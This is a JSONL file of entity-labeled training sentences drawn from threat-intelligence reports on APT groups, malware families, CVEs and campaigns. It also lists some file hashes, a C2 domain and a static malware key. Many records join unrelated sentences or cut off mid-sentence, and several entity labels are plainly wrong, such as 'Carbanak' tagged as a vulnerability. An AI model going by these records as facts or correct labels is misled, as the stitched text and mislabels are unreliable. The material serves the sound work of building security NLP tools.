{"text": "It appears the attackers sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) . In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide . They likely generate the encoded commands on their own systems before pasting them in to an HTML file hosted by the hop point . • Bad actors who want to get into the cyber attack business need little to no technical skills to get started .", "spans": {"ORGANIZATION: Palestinian Security Services": [[124, 153]], "ORGANIZATION: General Directorate of Civil Defence": [[160, 196]], "ORGANIZATION: Ministry of the Interior": [[199, 223]], "ORGANIZATION: Palestinian National Liberation Front": [[262, 299]], "TOOL: Macfog": [[368, 374]], "TOOL: native Mac OS X implementation": [[381, 411]], "TOOL: Icefog": [[415, 421]], "TOOL: HTML": [[564, 568]], "THREAT_ACTOR: Bad actors": [[602, 612]]}, "info": {"id": "cyberner_stix_train_004833", "source": "cyberner_stix_train"}}
{"text": "We can respond to those commands by instead sending two files of our choice to the Quasar serve .", "spans": {"MALWARE: Quasar": [[83, 89]]}, "info": {"id": "cyberner_stix_train_004834", "source": "cyberner_stix_train"}}
{"text": "] com ) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load . APT1 is a China-based cyber-espionage group , active since mid-2006 . In text mode, Glimpse manually builds a DNS query to be transmitted over a UDP socket . The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": {"SYSTEM: iOS": [[53, 56]], "THREAT_ACTOR: APT1": [[134, 138]], "THREAT_ACTOR: cyber-espionage group": [[156, 177]], "MALWARE: Glimpse": [[218, 225]], "TOOL: UDP socket": [[279, 289]], "MALWARE: CozyDuke": [[296, 304]], "SYSTEM: C2 server": [[373, 382]]}, "info": {"id": "cyberner_stix_train_004835", "source": "cyberner_stix_train"}}
{"text": "We examine their use malware such as Jaff , Bart , and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony .", "spans": {"MALWARE: Jaff": [[37, 41]], "MALWARE: Bart": [[44, 48]], "MALWARE: Rockloader": [[55, 65]], "MALWARE: Dridex": [[156, 162]], "MALWARE: Pony": [[167, 171]]}, "info": {"id": "cyberner_stix_train_004836", "source": "cyberner_stix_train"}}
{"text": "Accessibility Service is long known to be the Achilles ’ heel of the Android operating system . On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website . The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant .", "spans": {"SYSTEM: Android": [[69, 76]], "ORGANIZATION: we": [[108, 110]], "THREAT_ACTOR: SLUB": [[139, 143]], "MALWARE: IndiaBravo-PapaAlfa installer": [[201, 230]], "TOOL: DLL": [[273, 276]]}, "info": {"id": "cyberner_stix_train_004837", "source": "cyberner_stix_train"}}
{"text": "Scarlet Mimic primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[0, 13]], "THREAT_ACTOR: Ajax Security": [[246, 259]], "THREAT_ACTOR: Flying Kitten": [[277, 290]], "ORGANIZATION: CrowdStrike": [[296, 307]], "ORGANIZATION: dissidents": [[362, 372]]}, "info": {"id": "cyberner_stix_train_004838", "source": "cyberner_stix_train"}}
{"text": "The domain name , language of the site and app content hosted suggest this site is a third-party app store for whom the intended users are the Uyghurs . Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla’s more fully featured implants . These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are .", "spans": {"ORGANIZATION: Kaspersky": [[206, 215]], "THREAT_ACTOR: Turla’s": [[347, 354]], "THREAT_ACTOR: APT1": [[412, 416], [491, 495]]}, "info": {"id": "cyberner_stix_train_004839", "source": "cyberner_stix_train"}}
{"text": "Back in April 2019 , we first observed the Emissary Panda threat group exploiting CVE-2019-0604 to install webshells on SharePoint servers at government organizations in two Middle Eastern countries .", "spans": {"THREAT_ACTOR: Emissary Panda": [[43, 57]], "VULNERABILITY: CVE-2019-0604": [[82, 95]], "TOOL: SharePoint": [[120, 130]]}, "info": {"id": "cyberner_stix_train_004840", "source": "cyberner_stix_train"}}
{"text": "It is behind a large number of cyberattacks targeting global aerospace and defense contractors , military units , political parties , the International Olympic Committee ( IOC ) , anti-doping agencies , government departments and various other verticals .", "spans": {"ORGANIZATION: International Olympic Committee": [[138, 169]], "ORGANIZATION: IOC": [[172, 175]]}, "info": {"id": "cyberner_stix_train_004842", "source": "cyberner_stix_train"}}
{"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak trojan . The first method , described in Part D.l , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques .", "spans": {"MALWARE: Pony malware": [[102, 114]], "MALWARE: Barlaiy": [[230, 237]], "MALWARE: PlugXL": [[246, 252]], "THREAT_ACTOR: Barium": [[275, 281]]}, "info": {"id": "cyberner_stix_train_004843", "source": "cyberner_stix_train"}}
{"text": "The initial Flash object must contact the same C2 server to download a secondary payload ;", "spans": {"TOOL: Flash": [[12, 17]], "TOOL: C2": [[47, 49]]}, "info": {"id": "cyberner_stix_train_004844", "source": "cyberner_stix_train"}}
{"text": "Some recent campaigns against other bank customers also used “ .gdn ” TLDs . The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . Patchwork has been seen targeting industries related to diplomatic and government agencies .", "spans": {"THREAT_ACTOR: threat actors": [[81, 94]], "THREAT_ACTOR: Patchwork": [[255, 264]], "ORGANIZATION: diplomatic": [[311, 321]], "ORGANIZATION: government agencies": [[326, 345]]}, "info": {"id": "cyberner_stix_train_004845", "source": "cyberner_stix_train"}}
{"text": "When installed on a device , apps containing adware may , among other things : Annoy users with intrusive advertisements , including scam ads Waste the device ’ s battery resources Generate increased network traffic Gather users ’ personal information Hide their presence on the affected device to achieve persistence Generate revenue for their operator without any user interaction Conclusion Based solely on open source intelligence , we were able to trace the developer of the Ashas adware and establish his identity and discover additional related adware-infected apps . Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on . We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) .", "spans": {"MALWARE: Ashas": [[480, 485]], "MALWARE: Ordnance": [[575, 583]], "MALWARE: shellcode": [[676, 685]], "ORGANIZATION: financial organizations": [[807, 830]]}, "info": {"id": "cyberner_stix_train_004846", "source": "cyberner_stix_train"}}
{"text": "Once this malware has successfully installed , it will collect personal data , passwords , keystrokes , banking information , and more . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others .", "spans": {"MALWARE: More_eggs malware": [[168, 185]], "MALWARE: cmd.exe": [[269, 276]], "MALWARE: PIVY": [[295, 299]], "VULNERABILITY: zero-day": [[321, 329]], "VULNERABILITY: exploit": [[330, 337]]}, "info": {"id": "cyberner_stix_train_004847", "source": "cyberner_stix_train"}}
{"text": "Research presented in this report shows that the PUTTER PANDA operators are likely members of the 12th Bureau , 3rd General Staff Department ( GSD ) of the People 's Liberation Army ( PLA ) , operating from the unit 's headquarters in Shanghai with MUCD 61486 . Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[49, 61]], "THREAT_ACTOR: operators": [[62, 71]], "ORGANIZATION: People 's Liberation Army": [[156, 181]], "ORGANIZATION: PLA": [[184, 187]], "THREAT_ACTOR: MUCD 61486": [[249, 259]], "THREAT_ACTOR: Desert Falcons": [[262, 276]], "SYSTEM: Android": [[421, 428]]}, "info": {"id": "cyberner_stix_train_004848", "source": "cyberner_stix_train"}}
{"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnama's manufacturing , consumer products , and hospitality sectors . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"ORGANIZATION: FireEye": [[22, 29]], "THREAT_ACTOR: APT32": [[43, 48]], "ORGANIZATION: manufacturing": [[117, 130]], "ORGANIZATION: consumer products": [[133, 150]], "ORGANIZATION: hospitality sectors": [[157, 176]], "FILEPATH: document malware": [[205, 221]], "ORGANIZATION: Tibetan non-governmental organizations": [[241, 279]], "ORGANIZATION: NGOs": [[282, 286]], "ORGANIZATION: Falun Gong": [[308, 318]], "ORGANIZATION: Uyghur groups": [[323, 336]]}, "info": {"id": "cyberner_stix_train_004849", "source": "cyberner_stix_train"}}
{"text": "Package names for infected apps typically contain a common naming structure that includes com.XXXXXXXXX.camera , for example com.bird.sky.whale.camera ( app name : Whale Camera ) , com.color.rainbow.camera ( Rainbow Camera ) , and com.fishing.when.orangecamera ( Orange Camera ) . The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment . It may also download additional potentially malicious files . The command and control ( C2 ) server must be configured from either the command line or a configuration file .", "spans": {"SYSTEM: Whale Camera": [[164, 176]], "SYSTEM: Rainbow Camera": [[208, 222]], "SYSTEM: Orange Camera": [[263, 276]], "THREAT_ACTOR: Lazarus Group": [[285, 298]], "TOOL: RATs": [[320, 324]], "TOOL: staging malware": [[329, 344]]}, "info": {"id": "cyberner_stix_train_004850", "source": "cyberner_stix_train"}}
{"text": "The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out . In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets .", "spans": {"THREAT_ACTOR: GCMAN group": [[4, 15]], "ORGANIZATION: bank": [[82, 86]], "FILEPATH: SWAnalytics’": [[200, 212]]}, "info": {"id": "cyberner_stix_train_004851", "source": "cyberner_stix_train"}}
{"text": "The architecture is quite similar to the one described previously , but the opcodes are slightly different . Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran . To extract the payload , the malware will first initialize the GDI+ API and get the image width and height values . New variants based on leaked code are becoming more common We have continued seeing various malicious campaigns since the start of 2023 , where the threat actors have used new ransomware variants based on leaked source code or builders .", "spans": {"THREAT_ACTOR: threat group": [[142, 154]], "ORGANIZATION: FireEye": [[166, 173]], "THREAT_ACTOR: APT34": [[177, 182]]}, "info": {"id": "cyberner_stix_train_004852", "source": "cyberner_stix_train"}}
{"text": "However , the group is content leaving some malware on the network , likely to provide a contingency if other access channels are removed .", "spans": {}, "info": {"id": "cyberner_stix_train_004853", "source": "cyberner_stix_train"}}
{"text": "8f5d5d8419a4832d175a6028c9e7d445f1e99fdc12170db257df79831c69ae4e a5ebcdaf5fd10ec9de85d62e48cc97a4e08c699a7ebdeab0351b86ab1370557d 84578b9b2c3cc1c7bbfcf4038a6c76ae91dfc82eef5e4c6815627eaf6b4ae6f6 The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia . Rancor : DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E . Then , it is called passing reused allocated memory and not a pointer to structure .", "spans": {"ORGANIZATION: oil and gas": [[199, 210]], "THREAT_ACTOR: Naikon": [[303, 309]], "ORGANIZATION: energy resources": [[405, 421]], "THREAT_ACTOR: Rancor": [[470, 476]], "FILEPATH: DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E": [[479, 543]]}, "info": {"id": "cyberner_stix_train_004854", "source": "cyberner_stix_train"}}
{"text": "The attacks targeted high-profile targets , including government and commercial organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_004855", "source": "cyberner_stix_train"}}
{"text": "Related or not , one thing is certain : the actor ( s ) using these customized BlackEnergy malware are intent on stealing information from the targets . The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election .", "spans": {"THREAT_ACTOR: actor": [[44, 49]], "TOOL: BlackEnergy malware": [[79, 98]], "ORGANIZATION: military": [[279, 287]], "ORGANIZATION: government personnel": [[292, 312]], "ORGANIZATION: defense": [[365, 372]], "ORGANIZATION: government": [[377, 387]], "ORGANIZATION: authors": [[407, 414]], "ORGANIZATION: journalists": [[419, 430]]}, "info": {"id": "cyberner_stix_train_004856", "source": "cyberner_stix_train"}}
{"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[17, 22]], "FILEPATH: auddevc.txt": [[172, 183]]}, "info": {"id": "cyberner_stix_train_004857", "source": "cyberner_stix_train"}}
{"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . After the publication of the original report , these sites were taken offline despite the fact that one agent was even updated a six days prior to our post ( the \" Khuai \" application ) .", "spans": {"ORGANIZATION: Anomali": [[0, 7]], "MALWARE: ITW": [[86, 89]], "VULNERABILITY: CVE-2018-0798": [[117, 130]], "MALWARE: Khuai": [[297, 302]]}, "info": {"id": "cyberner_stix_train_004858", "source": "cyberner_stix_train"}}
{"text": "How Judy operates : To bypass Bouncer , Google Play ’ s protection , the hackers create a seemingly benign bridgehead app , meant to establish connection to the victim ’ s device , and insert it into the app store . In this campaign , the attackers experimented with publicly available tooling for attack operations . If the list does not contain any item , or if the verification has failed , the ZxShell sample tries to connect to a hardcoded host Budworm is a longrunning APT group that is believed to have been active since at least 2013 .", "spans": {"MALWARE: Judy": [[4, 8]], "SYSTEM: Bouncer": [[30, 37]], "SYSTEM: Google Play": [[40, 51]], "TOOL: publicly available tooling": [[267, 293]], "MALWARE: ZxShell": [[398, 405]], "THREAT_ACTOR: Budworm": [[450, 457]], "THREAT_ACTOR: APT group": [[475, 484]]}, "info": {"id": "cyberner_stix_train_004859", "source": "cyberner_stix_train"}}
{"text": "The most recent series of attacks observed was in December 2016 .", "spans": {}, "info": {"id": "cyberner_stix_train_004860", "source": "cyberner_stix_train"}}
{"text": "Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "TOOL: ICS": [[34, 37]]}, "info": {"id": "cyberner_stix_train_004861", "source": "cyberner_stix_train"}}
{"text": "SecureWorks Counter Threat Unit ( CTU ) researchers track the activities of Threat Group-4127 , which targets governments , military , and international non-governmental organizations ( NGOs ) .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[0, 31]], "ORGANIZATION: CTU": [[34, 37]], "ORGANIZATION: Threat Group-4127": [[76, 93]]}, "info": {"id": "cyberner_stix_train_004862", "source": "cyberner_stix_train"}}
{"text": "Code snippet showing GolfSpy generating UUID The value of % is in the range of 1-9 or a-j . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . But other bad actors have since adopted this businesses model , offering every from command and control servers to phishing bots - as - a - service .", "spans": {"MALWARE: GolfSpy": [[21, 28]], "VULNERABILITY: CVE-2018-8120": [[155, 168]], "TOOL: UACME": [[172, 177]], "MALWARE: GRIFFON": [[262, 269]], "TOOL: JScript": [[331, 338]], "THREAT_ACTOR: bad actors": [[439, 449]], "SYSTEM: command and control servers": [[513, 540]], "THREAT_ACTOR: phishing bots - as - a - service": [[544, 576]]}, "info": {"id": "cyberner_stix_train_004863", "source": "cyberner_stix_train"}}
{"text": "We will refer to this IP address as Command & Control ( or C&C ) .", "spans": {"TOOL: Command & Control": [[36, 53]], "TOOL: C&C": [[59, 62]]}, "info": {"id": "cyberner_stix_train_004864", "source": "cyberner_stix_train"}}
{"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals .", "spans": {"MALWARE: .rtf file": [[43, 52]], "VULNERABILITY: CVE-2017-0199": [[68, 81]], "FILEPATH: Sea Turtle": [[151, 161]]}, "info": {"id": "cyberner_stix_train_004865", "source": "cyberner_stix_train"}}
{"text": "The Trojan displays the extortion page ( extortionist.html ) that blocks the device and demands a ransom for unblocking it . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file . RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the group 's activity in the Middle East .", "spans": {"ORGANIZATION: Deepen": [[138, 144]], "THREAT_ACTOR: APT6": [[147, 151]], "TOOL: PDF": [[207, 210]], "TOOL: ZIP": [[215, 218]], "MALWARE: SCR file": [[295, 303]], "THREAT_ACTOR: RASPITE": [[306, 313]], "ORGANIZATION: Symantec": [[342, 350]], "THREAT_ACTOR: Leafminer": [[354, 363]]}, "info": {"id": "cyberner_stix_train_004866", "source": "cyberner_stix_train"}}
{"text": "Numerous targeted attack campaigns are occurring every week .", "spans": {}, "info": {"id": "cyberner_stix_train_004867", "source": "cyberner_stix_train"}}
{"text": "This ransomware family is known for being hosted on arbitrary websites and circulated on online forums using various social engineering lures , including masquerading as popular apps , cracked games , or video players . Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains . The failure examples are : From what we ’ve seen in Hack520 ’s blog , as well as the infrastructure deployed around it , it is quite safe to say that Hack520 is involved in aspects of the VPS service activity provided to groups like Winnti and other cybercriminals or threat actors .", "spans": {"THREAT_ACTOR: Gorgon Group": [[264, 276]], "TOOL: Bitly": [[287, 292]], "SYSTEM: VPS service": [[529, 540]], "THREAT_ACTOR: Winnti": [[574, 580]], "THREAT_ACTOR: threat actors": [[609, 622]]}, "info": {"id": "cyberner_stix_train_004868", "source": "cyberner_stix_train"}}
{"text": "The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: PDF exploits": [[41, 53]], "VULNERABILITY: Adobe Flash Player exploits": [[56, 83]], "VULNERABILITY: CVE-2012-0158": [[101, 114]], "VULNERABILITY: Word exploits": [[115, 128]], "TOOL: Tran Duy Linh": [[175, 188]], "ORGANIZATION: Microsoft": [[215, 224]], "TOOL: Outlook": [[225, 232]]}, "info": {"id": "cyberner_stix_train_004869", "source": "cyberner_stix_train"}}
{"text": "It comes as no surprise then that many SMS-Trojans include bot functionality . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network . One might also note that the number of modules embedded in this variant is much higher ( 17 ) than the number of modules embedded in the variants previously documented in our white paper ( 8 to 10 modules ) . Ransomware attacks have shown no signs of slowing down in 2023 .", "spans": {"MALWARE: Infostealer.Catchamas": [[160, 181]], "THREAT_ACTOR: Ransomware attacks": [[437, 455]]}, "info": {"id": "cyberner_stix_train_004870", "source": "cyberner_stix_train"}}
{"text": "Examples of the overlays available to the malware Above , you can see examples of the injections that distributed to the malware as part of this specific campaign . In line with commonly used APT actor methodologies , the threat actor aligns its decoy documents to a topic of interest relevant to the recipient . While the investigation is still in progress and full results and technical paper will be published during SAS 2019 conference in Singapore , we would like to share some important details about the attack . In several cases , the threat actor used 7 - zip to create an encrypted segmented archive to compress the reconnaissance results .", "spans": {"THREAT_ACTOR: APT actor": [[192, 201]], "THREAT_ACTOR: threat actor": [[222, 234]], "TOOL: decoy documents": [[246, 261]], "TOOL: 7 - zip": [[561, 568]]}, "info": {"id": "cyberner_stix_train_004871", "source": "cyberner_stix_train"}}
{"text": "The initial beacon to index.php changed to index.txt but ZeroT still expects an RC4 encrypted response using a static key : “ (*^GF (9042&* ” .", "spans": {"FILEPATH: index.php": [[22, 31]], "FILEPATH: index.txt": [[43, 52]], "MALWARE: ZeroT": [[57, 62]]}, "info": {"id": "cyberner_stix_train_004872", "source": "cyberner_stix_train"}}
{"text": "One possibility is that PLATINUM might have obtained compromised credentials from victim networks . The attackers first researched desired targets and then sent an email specifically to the target .", "spans": {"THREAT_ACTOR: PLATINUM": [[24, 32]]}, "info": {"id": "cyberner_stix_train_004873", "source": "cyberner_stix_train"}}
{"text": "Figure 1 : ‘ Agent Smith ’ s modular structure Technical Analysis – Loader Module The “ loader ” module , as stated above , extracts and runs the “ core ” module . Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 . 4 、A loader DLL , which is extracted from the archive ; APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "THREAT_ACTOR: Buhtrap": [[164, 171]], "ORGANIZATION: financial institutions": [[237, 259]], "TOOL: DLL": [[308, 311]], "THREAT_ACTOR: APT29": [[352, 357]]}, "info": {"id": "cyberner_stix_train_004874", "source": "cyberner_stix_train"}}
{"text": "In addition to that , API function names are reversed , presumably to avoid detection in memory .", "spans": {}, "info": {"id": "cyberner_stix_train_004875", "source": "cyberner_stix_train"}}
{"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 .", "spans": {"ORGANIZATION: banks": [[38, 43]], "TOOL: Emotet": [[46, 52], [166, 172]], "ORGANIZATION: Kaspersky": [[342, 351]], "MALWARE: Octopus": [[420, 427]]}, "info": {"id": "cyberner_stix_train_004876", "source": "cyberner_stix_train"}}
{"text": "However , using valid code-signing certificates stolen from organizations with a positive reputation can allow attackers to piggyback on that company ’s trust , making it easier to slip by these defenses and gain access to targeted computers .", "spans": {}, "info": {"id": "cyberner_stix_train_004877", "source": "cyberner_stix_train"}}
{"text": "Audit ISAPI filters and search for web shells on Microsoft Exchange servers .", "spans": {"TOOL: ISAPI": [[6, 11]], "ORGANIZATION: Microsoft": [[49, 58]], "TOOL: Exchange": [[59, 67]]}, "info": {"id": "cyberner_stix_train_004878", "source": "cyberner_stix_train"}}
{"text": "Additionally the author did some small updates after publications from the security community , again this is common for actors of this sophisticated nature , once their campaigns have been exposed they will often try to change tooling to ensure better avoidance .", "spans": {}, "info": {"id": "cyberner_stix_train_004879", "source": "cyberner_stix_train"}}
{"text": "The use of HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate .", "spans": {"TOOL: HLS": [[11, 14]], "TOOL: ActionScript": [[41, 53]], "TOOL: f4player": [[68, 76]]}, "info": {"id": "cyberner_stix_train_004880", "source": "cyberner_stix_train"}}
{"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": {"MALWARE: malware": [[6, 13]], "ORGANIZATION: government": [[90, 100]], "ORGANIZATION: private": [[105, 112]], "ORGANIZATION: organizations": [[113, 126]], "ORGANIZATION: Symantec": [[129, 137]], "FILEPATH: Starloader files": [[160, 176]], "FILEPATH: AdobeUpdate.exe": [[189, 204]], "FILEPATH: AcrobatUpdate.exe": [[207, 224]], "FILEPATH: INTELUPDATE.EXE": [[231, 246]]}, "info": {"id": "cyberner_stix_train_004881", "source": "cyberner_stix_train"}}
{"text": "Some are first uploaded with all the necessary code except the one line that actually initializes the billing process . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . These include remote desktop , webcam spying , remote shell , and file management . By the end of 2022 , Cuba ransomware threat actors had compromised over 100 organizations worldwide .", "spans": {"MALWARE: MXI Player": [[120, 130]], "THREAT_ACTOR: Cuba ransomware threat actors": [[387, 416]]}, "info": {"id": "cyberner_stix_train_004882", "source": "cyberner_stix_train"}}
{"text": "For the following reasons , CTU researchers assess with moderate confidence that TG-3390 has a Chinese nexus :", "spans": {"ORGANIZATION: CTU": [[28, 31]], "THREAT_ACTOR: TG-3390": [[81, 88]]}, "info": {"id": "cyberner_stix_train_004883", "source": "cyberner_stix_train"}}
{"text": "Users do n't have to install any additional security services to keep their devices safe . Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East . Although the malware uses different configurations in each case , the three affected software products included the same backdoor code and were launched using the same mechanism . The malware will then create the file RECOVERFILES.txt in each scanned folder .", "spans": {"THREAT_ACTOR: Leafminer": [[91, 100]], "THREAT_ACTOR: group": [[120, 125]], "MALWARE: malware": [[388, 395]]}, "info": {"id": "cyberner_stix_train_004884", "source": "cyberner_stix_train"}}
{"text": "This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users . BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": {}, "info": {"id": "cyberner_stix_train_004885", "source": "cyberner_stix_train"}}
{"text": "In addition to stealing keystrokes , Naikon also intercepted network traffic . CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": {"THREAT_ACTOR: Naikon": [[37, 43]], "THREAT_ACTOR: CNIIHM": [[79, 85]], "THREAT_ACTOR: TEMP.Veles": [[181, 191]]}, "info": {"id": "cyberner_stix_train_004886", "source": "cyberner_stix_train"}}
{"text": "As we noted in our previous research on the Apple threat landscape , some operating systems , such as Mac OS X , are configured by default to only allow applications to run if they have been signed with a valid certificate , meaning they are trusted .", "spans": {"ORGANIZATION: Apple": [[44, 49]], "SYSTEM: Mac OS X": [[102, 110]]}, "info": {"id": "cyberner_stix_train_004887", "source": "cyberner_stix_train"}}
{"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members .", "spans": {"MALWARE: MXI Player": [[0, 10]]}, "info": {"id": "cyberner_stix_train_004888", "source": "cyberner_stix_train"}}
{"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , government , and media for espionage and destructive purposes , since at least 2011 . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": {"TOOL: Black Energy": [[117, 129]], "ORGANIZATION: energy": [[165, 171]], "ORGANIZATION: government": [[174, 184]], "ORGANIZATION: media": [[191, 196]], "THREAT_ACTOR: espionage": [[201, 210]], "ORGANIZATION: government agencies": [[365, 384]], "ORGANIZATION: Fatah political party": [[393, 414]]}, "info": {"id": "cyberner_stix_train_004889", "source": "cyberner_stix_train"}}
{"text": "Technical analysis Most of this new attack ’ s routines are similar to those of the previous XLoader versions . Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE . The table below describes the operational mode, record types used, and the method used to send the . According to a recent V3.co.uk article , 95 percent of companies have already fallen victim to attacks from advanced malware and suffer from an average of 643 successful infections per week .", "spans": {"MALWARE: XLoader": [[93, 100]], "ORGANIZATION: Arbor": [[137, 142]], "ORGANIZATION: FireEye": [[155, 162]], "THREAT_ACTOR: APT12": [[176, 181]], "TOOL: HIGHTIDE": [[219, 227]], "ORGANIZATION: V3.co.uk": [[353, 361]], "ORGANIZATION: companies": [[386, 395]], "MALWARE: malware": [[448, 455]]}, "info": {"id": "cyberner_stix_train_004890", "source": "cyberner_stix_train"}}
{"text": "The Evidence Collector module is responsible for the spying routines outlined above . The first successful bank robbery was committed by this group in January 2013 . , Anonymous Sudan accounted for 63 % of total identified DDoS attacks claimed by the KillNet collective in 2023 .", "spans": {"THREAT_ACTOR: group": [[142, 147]], "THREAT_ACTOR: Anonymous Sudan": [[168, 183]], "THREAT_ACTOR: DDoS attacks": [[223, 235]]}, "info": {"id": "cyberner_stix_train_004891", "source": "cyberner_stix_train"}}
{"text": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "MALWARE: malicious attachments": [[37, 58]], "MALWARE: malware": [[188, 195]], "FILEPATH: .lnk": [[250, 254]]}, "info": {"id": "cyberner_stix_train_004892", "source": "cyberner_stix_train"}}
{"text": "Uploaded files are written to the server sub directory “ clients\\user_name@machine_name_ipaddress ” .", "spans": {"FILEPATH: clients\\user_name@machine_name_ipaddress": [[57, 97]]}, "info": {"id": "cyberner_stix_train_004893", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "VULNERABILITY: exploit": [[212, 219]], "MALWARE: keylogger": [[261, 270]], "MALWARE: backdoor": [[275, 283]], "MALWARE: malware": [[284, 291]]}, "info": {"id": "cyberner_stix_train_004894", "source": "cyberner_stix_train"}}
